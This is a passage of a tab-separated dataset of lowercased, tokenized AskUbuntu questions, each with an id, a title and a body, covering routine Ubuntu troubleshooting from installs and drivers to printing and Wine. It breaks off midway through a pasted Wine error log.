292160	are there any complementary tools for the info command ?	i 've been using man for a while and know there commands like apropos or whatis that refer to man pages . but , are there any equivalent of theses or some complementary tools of the same sort for texinfo tools ?
292161	micro sd card help	i am running a fresh ( full wipe install ) of ubuntu 12.04 and i am trying to get my microsd card to work . the card is a samsung 2gb microsd card , and the reader i am using is a usb dongle ( targus multi card reader , has been used once on the same computer when i was previously running windows ) the microsd card is inserted into a sandisk microsd to sd adapter . the reader shows up under lsusb as : bus 002 device 002 : id 058f:6366 alcor micro corp. multi flash reader i have inserted the dongle and it does recognize the card reader under disk utility . it reads my cd drive , hard drive , and my `` multiple card reader '' and it reads the storage space as 2gb . however it says it is not partitioned ? if i use the disk utility to attempt to format the volume ( not the drive , as it seems to be referring to the card reader itself ) , it fails and says the following an error occurred while performing an operation on `` 2.0gb unrecognized '' ( whole-disk volume on multiple card reader ) : the operation failed with the following details : error creating file system : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sdb : input/output error to be honest i do n't care if i get the card working . all i need to do is get the sd card as bootable for a project ( trying to root my friend 's nook tablet ) . suggestions ? i would prefer to try fighting with this before going and trying to purchase a new card reader .
292162	is there a way to make the tooltips on launcher applications appear without delay in 13.04 ?	is there a way , for example in ccsm to change the delay before launcher tooltips are shown , because for whatever strange reason , the launcher does n't respond to me clicking on an application , before the tooltip is shown ?
292168	what environment do i need to deploy the virtual-maas charm ?	i know this has n't been released yet , but i 'm trying to use it anyway . : ) this readme http : //bazaar.launchpad.net/~virtual-maasers/charms/precise/virtual-maas/trunk/view/head : /readme.md says that you can deploy this virtual-maas charm by just doing juju deploy virtual-mass but , it seems like it assumes that there is already a working juju environment . what type of environment would that be , local ? how do you set things up so you can get to the point of doing the above command ?
292173	install ubuntu 13.04	i had downloaded the ubuntu 13.04 iso and and made it bootable on a usb , but when i press f12 nothing happened and my computer just started windows 7 regularly .
292176	how can i install my sims 3 expansion packs ?	i just installed ubuntu 13.04 and i like it . however , i ca n't figure out how to install my sims3 expsansion packs from origin through winehq . usually on windows 's i 'm able to play my sims 3 after installation without origin being open . ( without running/having origin open )
292177	ubuntu installation hangs when using wubi	i installed ubuntu 12.04.1lts using wubi installer . it worked absolutely fine and i used it for a while and installed some updates too . for some reason i had to uninstall ubuntu . i uninstalled ubuntu 12.04.1 from control panel > programs and features > ubuntu . it successfully uninstalled ubuntu . i then installed ubuntu 12.10 using wubi installer available in the iso image . the system restarted and started installing ubuntu 12.10 . when the installation reached about 70 % it hung [ stuck ] . the message on the installer is `` almost finishing copying files '' . i waited for nearly an hour , but in vain . i powered off the pc [ by keeping the power button pressed ] and booted windows [ no issues with windows ] . again i uninstalled ubuntu , and ran wubi to install 12.04.1 , but again it hangs at the same point . i repeated the installation a couple of times , but it always fails at the same point . question is whats going wrong ? it worked fine the first time , after uninstalling ubuntu , its not reinstalling . please help . thank you .
292184	installation failure of virtualbox extension	i 'm attempting to add the oracle vm virtualbox extension pack 4.2.12 to my virtualbox settings . when it asks me for authorization , i enter the same password i use with ubuntu software center or any other request for authorization . i get this message after 3 attempts : failed to install the extension pack /home/camraman1/downloads/oracle_vm_virtualbox_extension_pack-4.2.12-84980.vbox-extpack . the installer failed with exit code 1 : gnome_sudo_pass sorry , try again . gnome_sudo_pass sorry , try again . sudo : 3 incorrect password attempts . result code : ns_error_failure ( 0x80004005 ) component : extpackmanager interface : iextpackmanager { 3295e6ce-b051-47b2-9514-2c588bfe7554 } i 'm a newbie in the world of linux . a windows user all of my life ( except a brief time with commodore ) , so i 'm a old guy in a young person 's world . help me out . i 've read and reread the manual . obviously there are a few steps i must have missed or just do n't understand . i 've created my vm using windows xp . i 've added myself to the vboxusers group . my system information is listed below . -computer- processor : 2x intel ( r ) core ( tm ) 2 cpu 6400 @ 2.13ghz memory : 1010mb ( 701mb used ) operating system : ubuntu 12.04.2 lts date/time : tue 07 may 2013 11:21:38 am cdt -display- resolution : 1680x1050 pixels opengl renderer : unknown x11 vendor : the x.org foundation -multimedia- audio adapter : hda-intel - hda intel -input devices- power button power button at translated set 2 keyboard hda intel line hda intel front mic hda intel rear mic hda intel front headphone hda intel line-out imps/2 logitech wheel mouse -printers ( cups ) - deskjet-3050-j610-series : default -scsi disks- nec dvd_rw nd-3520a ata hitachi hds72168 toshiba external usb 3.0 seagate freeagentdesktop pny usb 2.0 fd what other information do you need from me so i can begin using the virtualbox software to it 's fullest potential ? thanks in advance .
292187	how do i downgrade rhythmbox in ubuntu 13.04	i run ubuntu 13.04 and i use rhythmbox 2.98 . this version is full of bugs and i would like to downgrade to 2.97 or older how can i do this ? thanks here is my sources.list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //fr.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //fr.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //fr.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring universe deb http : //fr.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //fr.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //fr.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //fr.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main
292188	xubuntu splash hangs on boot for 15s	problem started recently . when i log in ( in 80 % of cases ) , the spinning logo on blue background hangs ( wheel does n't spin ) for around 15s . afterwards , the login box shows normally . what 's interesting is that if i try to login in tty2 while it 's stuck , the login also stucks for a while after entering password and showing the welcome to ubuntu message . edit : could it be connected with the fact that my audio stopped working recently ? no big update , but all of a sudden , only dummy output is shown . dunno whether a `` small '' kernel update was released . petr @ sova : ~ $ uname -a linux sova 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux
292189	attributeerror : 'tuple ' object has no attribute 'translate '	i am developing this program and for some reason , i keep getting this error . is this an ubuntu caused error , or something in my code that it crashing my program ? i am accessing a database and trying to remove the following characters from output : and , via value.translate ( dictionary_of_bad_characters ) . that 's where i get my error . def get_data ( plu ) : # get the data needed global value # set the variable value to global conn = sqlite3.connect ( 'plus.sqlite ' ) # connect to the sqlite3 database cursor = conn.cursor ( ) # set cursor as the cursor for plus.sqlite results = cursor.execute ( 'select value from plus where plu= ? ' , [ plu ] ) # above code gets the data value for value with the plu of plu value = results.fetchone ( ) # get the results of value data = [ row [ 0 ] for row in results.fetchall ( ) ] translation_table = dict.fromkeys ( map ( ord , '+- ( ) , ' ) , none ) # above code creates a table with the mapped characters value = value.translate ( translation_table ) # above code removes any unnescessary characters from value response = { 'plu ' : plu , 'value ' : value } # create the response variable value = int ( value ) # convert value to type integer cursor.close ( ) # close the cursor conn.close ( ) # close the connection return ( value ) # return to the program flow
292190	nautilus search provider gnome-shell activities / overview	i do not get search results for files in the gnome shell overview except for files that are placed in my home folder . currently , i am using ubuntu gnome 13.04 with gs 3.8 from the gnome3 ppa , but have not added the gnome3 staging ppa yet ( seems to be risky ) . in the tracker gui configuration my favourites ( downloads , documents , et cetera ) are marked as recursive . gnome documents also indexes and displays files in subfolders properly . i 've checked dconf as well and everything seems to be fine : [ ' & desktop ' , ' & pictures ' , ' & documents ' , ' & download ' , ' & music ' , ' & videos ' ] only the home folder is marked as index-single-directories : [ ' $ home ' ] could there be a problem caused by my language settings ? i 've read about issues concerning tracker in regard to language settings , so i already cleared my tracker db and restarted scanning , but still no results . whenever i move a file to my home folder , it will be displayed instantly . what can i do about that ?
292195	correctly align advanced format drive ?	i bought a new wd hard drive . 250gb , wd2500bpt . i installed ubuntu ( 13.04 was it ? ) on it . i heard that i do n't have to worry about the block size/ alignment . however , cat /sys/block/sda/queue/logical_block_size shows 512 , not 4096. also fdisk tells in the startup that the disk is n't aligned correctly . what do i have to do ? what 's wrong ?
292197	my ubuntu 12.04.2 online accounts only has google and windows live accounts . where are the others ?	i just reinstalled ubuntu 12.04 , fully updated it and i went to set up my online accounts . it only has two account types to add , google and windows live accounts . there is no option to add facebook , or any of the others that used to show up . any ideas why this is ?
292210	connecting a samsung galaxy s3 in ubuntu 13.04	in 13.04 , whenever i connect an android device , one of three things happens : 1 . it mounts successfully ( maybe once out of 3 attempts ) 2 . it fails to mount with the following error message : oops ! something went wrong . unhandled error message : unable to open mtp device 3 . this one occasionally happens : unhandled error message : no such interface `org.gtk.vfs.mount ' on object at path /org/gtk/vfs/mount/1 regardless of activity ( even when successfully mounted ) it will continuously spam the following error message : unable to mount samsung_android unable to open mtp device ' [ usb:003,00x ] ' where x seems to be an arbitrary number below 10 and continues counting up with each new error message until the device is unplugged . i 've also just noticed that even if it mounts successfully , it unmounts after about 30 seconds and starts spamming the error message above . the android device is unlocked , always on and fully charged . adb seems to function normally . any suggestions ? further info : this happens on both a stock samsung s3 and an xperia arc s running a custom aosp based rom . i 've also tried the steps outlined in this stack overflow answer , but the problem persists . update : after doing a dist-upgrade ( may 8th 2013 ) , the xperia arc s on aosp rom now mounts and behaves normally . the s3 , however , still behaves as described above . update : after careful observation , abd does not , in fact , behave normally . if the error message above appears while sending an app to the device , the attempt is aborted with an error message saying that the device is unavailable .
292217	how to enable intel vt-x ?	i have a clevo w150erm , with a i7-3610qm processor , which supports intel vt-x . however in order to use it i have to activate that option in the bios ( or so that 's what i believe ) but i simply ca n't find it . is there a way to let me know if i have the intel vt-x option enabled or to activate it without using the bios ? if not , where am i supposed to activate it in the bios ? i simply ca n't find it : s
292221	is there a app for ubuntu 12.04 to learn command line ?	i am new to linux / ubuntu . i want to learn command line . what app can i get and use from ubuntu software center ? ? also looking for an app from ubuntu software center to send free sms text messages from ub 12.04 to cell # s world wide ? ? ? thanks paul
292224	bad 3d performance of intel ironlake	i 'm using ubuntu 13.04 and got very bad 3d performance with intel ironlake comparing with a windows installation . is there any way i can improve this ? i already tried various paramaters of the i915 kernel module , but that did n't help much ... sna is already enabled .
292226	my wallpaper can not be changed and my ubuntu tweak can not launch even after an ugrade	i was previously using ubuntu version 12.10 and i recently upgraded to version 13.04 . everything was working fine until i updated . immediately after the update , my wallpaper can not seen on screen again . also when i use darker themes such as dorian themes , my desktop freezes . i tried all the suggested helps and answers such as dconf editor but there is no way forward . searching the web for answers reveals that this appears to be a general problem . i really need help .
292227	ubuntu 13.04 not locking screen	i might have uninstalled some packages i should n't . for now , the only thing i 've been missing is the lock screen . when i press ctrl + alt + l , or press the `` lock '' button on the shutdown menu or i press the turn-off button and select `` lock '' nothing happens . do you guys have any ideas on what i can do ? thanks .
292228	what 's the difference between the nvidia v304.xx and the v173.xx driver branches ?	i know the question has nothing to do with ubuntu directly , but i 'm trying to decide what driver to use . i ca n't seem to google my way to victory today and i figured this community would be the next best place to ask . nvidia lists the following : linux x64 ( amd64/em64t ) display driver v173.1437 was released on april 5 , 2013 . linux x64 ( amd64/em64t ) display driver v304.88 was released on april 2 , 2013. v304 ca n't be just a beta branch , because nvidia also explicitly labels the beta versions with the word `` beta '' in red . so what is it ?
292230	how to install ubuntu on lenovo g580 ?	i 'd like to install ubuntu 13.04 on lenovo g580 and i have this issue . after a few seconds of booting liveusb screens gets black and nothing happens . i 've read somewhere about connecting second screen to solve similar issue . of course this did n't solve it , but it provided something like terminal with initramfs > and few basic commands .. is it possible to install ubuntu on lenovo g580 hardware ? i also checked ubuntu 12.04 : failed mint 13 : succeed ( x32 and x64 ) is it because of drivers ? of course i want ubuntu instead of mint . : )
292240	how to disable ubuntu 13.04 unity fancy visual effects ?	unity works very fast but pretty unstable on my pc ( with intel gma x4500hd video card ) . for example the ubuntu purple-black splash screen is stuck as the desktop background ( changing it in the settings changes nothing ) and occasional ui hangs ( while switching to a console with ctrl+alt+ # still works ) are frequent . i would gladly sacrifice fancy gpu-accelerated effects if possible . are there such tweaks available ? please do n't suggest using another de - i know of them but would like unity if possible .
292241	how to find the ppa of the skype package ?	for example , with a webpage like this : https : //launchpad.net/ubuntu/+source/skype , how can i find out to which ppa this package belongs ? thanks !
292244	how do i setup multiple minicom / cisco console server sessions without too much hassle ?	i 'm working on my ccna and have 4 switches & 4 routers which make up my main lab . i bought two quad port usb to serial ( 1 usb to 4 serial ) adapters onto the ends of which i 've attached 8 serial crossover cables . those usbs are plugged into a p4 ubuntu server and i can successfully ssh into that server and manage any of the devices using minicom , as myself as i 'm in the dialout group . i have a minicom save file for usb [ 0-7 ] and have used ln to link sw1-4 , r1-4 so i can `` minicom r1 '' , etc . with my dual monitors , i can have all 8 terminal sessions open - 4 on each screen . here 's the main thing though : i have to open a terminal on my workstation , ssh across to the access server , then run minicom . i have to do this once for each device . although that 's not a back breaker , i 'm sure there must be a simpler way to do it - can i tell my server to expose each serial connection as a telnet or ssh port ? i would really like to be able to run a script of some sort that launched all eight sessions in one click .
292245	partial upgrade - why remove mariadb ?	my 12.04 system wants to run a partial upgrade , as part of which it proposes to remove certain mariadb packages ( see screenshot below ) . attached is my sources.list file - i do n't understand why the system should be proposing the removal of the mariadb packages , given i have explicitly chosen mariadb as a replacement for mysql ? clive @ cooler-master : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main # mariadb 5.5 repository list - created 2012-09-21 09:23 utc # http : //downloads.mariadb.org/mariadb/repositories/ deb http : //ftp.heanet.ie/mirrors/mariadb/repo/5.5/ubuntu precise main deb-src http : //ftp.heanet.ie/mirrors/mariadb/repo/5.5/ubuntu precise main # deb http : //repository.spotify.com stable non-free deb http : //deb.opera.com/opera/ stable non-free deb http : //ppa.launchpad.net/yorba/ppa/ubuntu precise main deb-src http : //ppa.launchpad.net/yorba/ppa/ubuntu precise main
292247	wo n't boot to unity or cairo dock on 13.04 ?	i 've just booted up and when i log into either cairo dock or unity/ubuntu neither of them launch , leaving me with just the wallpaper displayed but no desktop , so to speak . it 's 13.04 , and in order to use cairo dock properly i had to disable the unity plug-in using compiz , otherwise the unity desktop always launched . i 've ran the file utilities etc . from the recovery options at startup , but to no avail . i do n't know what went wrong when the machine was booting this time , or how to fix it ! ! i can launch the terminal from the keyboard - how do i re-enable unity , start compiz etc . from the terminal , so as i can start figuring out what has gone wrong ? thanks in advance .
292251	can you disable part of a touchpad ?	can you disable only part of a touchpad ? i 'm using a lenovo yoga13 , and the touchpad extends down into the click area . so , every time i click , it moves the mouse a little bit . it 's pretty annoying . is there a calibration tool or something ? i just need to disable the bottom inch of my touchpad .
292252	ubuntu 12.04 cd-r does n't start when i start the pc	i 've got an ubuntu cd-r and a samsung laptop with windows 8 64 bit . when i start the laptop with the ubuntu cd-r in it , it shows the samsung-sign , makes a `` beep '' tune , shows the normal `` loading-circle '' and then windows 8 starts normaly ... i know something about changing the boot device in the bios , but my laptop does n't show the normal message `` press f12 to bios setup '' , its just the samsung-sign and then windows 8 boots , so i dont know how to enter the bios ... tank you for your help and sorry for my bad english : )
292253	problem with starting steam on ubuntu 64-bit	i 've recently installed ubuntu , and tried installing steam . it would n't start so naturally i went `` google has the answer '' , and it had . my problem is this : this line wo n't run . sudo dpkg -- add-architecture i386 it tells me this when i enter it : dpkg : error : unknown option -- add-architecture .
292255	how to make my server email me when there are security updates ?	there 's obviously a way to check to see when an update is a security update . i often get greeted by a motd that says `` there are n security updates . '' what i 'd like to do is have my server email me a list of what packages need updating for security reasons . to take it a step further , the email would link to the applicable security notification from ubuntu . basically , each server is somewhat unique . i 've received several emails on the security mailing list for packages i do not have install on any/all servers . so i 'd like each individual server to tell me what it needs . that way i can apply updates in a timely manner , while avoiding restarting services like apache that would cause users to have some downtime . how could i do this ?
292262	bad hdd in lvm recovery time at boot	my server/desktop started reporting read errors on a hdd in my 16 drive lvm . the drive is a 2tb wd ears model . while i have a backup from april , i 'd rather not loose the last month of changes , or the time it will take to rebuild from the backup . as before , i used the gui to remove the bad drive . pvmove crashed during the process . shortly after that the server crashed . on bootup it began a repair process . that was saturday morning , about 3 1/2 days ago . the server is still showing the bootup messages regarding read errors with a sector number . the sector number continues to get larger showing progress is being made . the number is approaching 420 million . i cant access the server on the network or the local cli/gui desktop . how long should i let the process run for ?
292267	can i keep applications open after last window is closed ?	is it possible to have a mac os behavior in ubuntu 13.04 and let an app stay active / open after last window is closed ?
292268	run .sh every time a file changes	i 'm working with a system that uses a ubuntu server as base but we do program at windows . the vms are using the mount command to have access to the files at windows . everytime someone saves a file , that person needs to get to the server and rerun the command to get erp server down and up again . since we do not change the files a lot ( a team of 2 or 3 are working on a few files ) , there is any way to trigger a script every time a file gets changed ? workflow : programmer saves file > > windows update file at erp folder > > linux instance who has the windows folder mounted gets the update > > linux executes .sh who reruns the server .
292272	screwed up partitions	i 'm using an imac using ubuntu , i made a bootable gparted usb ( via unetbootin ) to partition my hard drive . i reduced the size of my ubuntu partition and added two hfs+ primary partitions . now , even after removing the two other partitions , and making the ubuntu partition bigger , it wo n't boot . if i press alt , the hd does n't even show up
292276	how can i measure how much ram has been used by a command	i 'm trying to measure the memory of a process that i call via the command line ( i.e. , i want to find out much ram it takes to for the process ) . is there any command that i can add to the command calling the process that will achieve this ?
292281	error with ubuntu 12.10	i just have deleted some file of the operating system and i have access just from the terminal . everything else is disappeared . last think i did it was a the installation of a python interpreter . is it likely to have some source list deleted . i dont know whether i can restore my system . i dont know how to access my internet connection from the termial . so i can not update or upgrade anything . another thing is that whatever i write on my terminal it does n't appear but it remains invisible . so i should be careful what i type in otherwise i will make thing worse . in same cases i cant even see any feedback from my terminal this is even more confusing . is there any way out how to restore it a day before unless there is any other way more efficient thank you in advance vangjush komini
292282	how to use an image for my custom .desktop file for unity previews	when one left clicks an application , it also displays the screenshot of the desired application . screenshot of the desired effect : i ca n't find the screenshotlink= ? command in the vlc.desktop file ( and or other .desktop files ) this is what i have now : question : how to get an image for my custom made .desktop file . note : if needed , i can post the code used for my custom .desktop file
292284	running a classic asp website on ubuntu 12.04	i will start the conversion of an old web site programmed on classic asp to php . i 'd like to run and test the asp scripts locally . so , how can i run these asp scripts in my linux ubuntu 12.04 ( w/ lxde ) system ? i know i can use a vm in virtual box and install the stuff there . if this is the only solution , maybe i 'll do that . perhaps someone will suggest something on wine . i do n't know . but i would prefer if there is something that can run natively , as php itself runs ... ideally i would configure my nginx http server similarly as i do for the php files ... i wonder if such an installable linux version of classic asp exists ... does it ? thank you .
292288	files ( nautilus ? ) shows the real location of symbolic links	i some of the `` folders '' in my home directory are symbolic links to a larger hard drive mounted on /mnt/data . i would like it if when i click on ( for example ) music in my home directory , nautilus showed ~/music . instead it shows /mnt/data/music . not a bug exactly ... but it would be nice if going `` up '' went back to my home directory instead of to the mount point . is there a way to change the behaviour of nautilus in this regard ?
292290	desktop environments not working properly after nvidia graphic driver installation	so i tried to install the graphics drivers for my nvidia geforce gt540m on ubuntu 13.04 64 bit . i tried following the instructions here : http : //ubuntuforums.org/showthread.php ? t=1916961 but it did n't work right and now the only desktop environment i can boot into is gnome fallback . ( i have unity and cinnamon installed as well . ) in unity metacity does n't work anymore and in cinnamon it crashes and goes to fallback . i just want to get my system back to the way that it was and i was going to follow the following instructions to install the nvidia drivers : https : //wiki.ubuntu.com/bumblebee # installation please advise how to fix my current problem and also if i should follow the instructions provided in the link or a different set of instructions . thanks in advance .
292294	why does ctrl key resize window in unity desktop ?	i have an almost out-of-the-box install of 12.04 precise . i am familiar with assigning and reassigning keyboard shortcuts , as i interact with my computer almost entirely through the keyboard . i am new to the unity desktop , and so this behavior is mysterious to me . the keystroke ctrl-p is ubiquitous in both the terminal and emacs , so it 's quite frustrating that as soon as i push the ctrl key , a maximized window resizes to whichever size it had previously . this happens across various applications . what is the name of this shortcut ( not the particular accelerator that may be assigned ) ? how do i disable this annoying behavior ?
292296	new password , please help !	i have n't used my linux computer in a couple of months because i went abroad , so i downgraded to be safe in case it got stolen ; but the thing is i can not log in because the password i believe to have used does not work any more . is there a way i can change this or do i have to take it into a store ? thanks !
292298	disable discovery or listing of hdd partitions	i would like to disable auto detection or listing of certain partitions in applications such as nautilus . i have a hp laptop that contains a recovery partition along with a efi partition and i would like to hide/disable them so they are not visible to any ubuntu user to prevent accidentally changing these . can this be done ?
292301	how do i activate the dash to display feeds from my online accounts in the social media lense ?	just upgraded to 13.04 . i was hoping that the dash would replace gwibber , but i can not even see my facebook or twitter accounts in the social media lense . all my online accounts are there , but nothing is showing up for an option for the unity dash , unless i 'm looking in the wrong spot of coarse ... . thank you !
292305	ubuntu can only hibernate once ?	system : lenovo y500 running dual boot windows 8 and ubuntu 12.04 for some reason , i can only hibernate 1 time after ( re ) booting up the system . if i hibernate after the first time , the system goes through all the motions , but returns me to the lock screen . how can i fix this ?
292307	how to set up samba / cups print server ?	i am using 13.04 on an old laptop hooked up to a printer that i would like to access from my windows 8 pc . i have been working on this for hours and i can not seem to get the right configuration of samba and cups to make it work . i had it working once before but i had to re-install for an unrelated reason . did not think of backing up the configuration files ... anyways , i would like to be able to go onto my windows computer open up the network folder and see the server show up . then when i open the server , for it to show me all the printers connected to that computer . and finally , to be able to install and print right from there . i have searched hours and tried multiple solutions but none seem to work . as soon as i get a reasonable answer , i will wipe my current configuration and start from scratch , so that none of my work will interfere with the solution . please when you answer make sure to start from the beginning . as i will not have a single thing set up . ( e.g . list all commands , program requirements , etc ) thanks for the help !
292309	system languages mess	a friend installed ubuntu for me in spanish . i would like to switch it back to english . i tried the `` apply system wide '' but now it seems i messed something up , because now some things are in english and some instructions remain in spanish . is there a way to even this out ? what i would like to do is set the system language to english and all text editions to spanish , is that possible ? maybe re-install ubuntu in english over ? also , i installed gnome do and each time i try to set the activation keys , it wont remember them . thank you .
292311	program fails with strange errors in wine	i just installed silhouette studio in wine . the installation appeared to finish , but when running the program it hangs infinitely at `` initializing . '' when launched from a terminal , i get the following output : fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_getcontentlength ( 0x60745520 ) - > ( 0x8f60e0 ) fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607c60b0 ) - > ( 0x8f5e28 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5f9d7dd8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5f9f99b8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x603c6d78 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x6065d338 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5d9a6980 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x12465878 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607c06d8 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60659e78 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_getcontentlength ( 0x606feb10 ) - > ( 0x8f6500 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x607e7560 ) - > ( 0x8f6248 ) fixme : wininet : commiturlcacheentryinternal entry already in cache - do n't know what to do ! fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5da49050 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x6074fae0 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x5eeed968 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_getcontentlength ( 0x603d8998 ) - > ( 0x8f6500 ) fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x60169800 ) - > ( 0x8f6248 ) fixme : wininet : urlcache_findfirstfreeentry grow file err : wininet : commiturlcacheentryinternal no free entries fixme : wininet : internetlockrequestfile stub fixme : mshtml : nschannel_isnocacheresponse ( 0x605e0918 ) - > ( 0x8f6248 ) fixme : 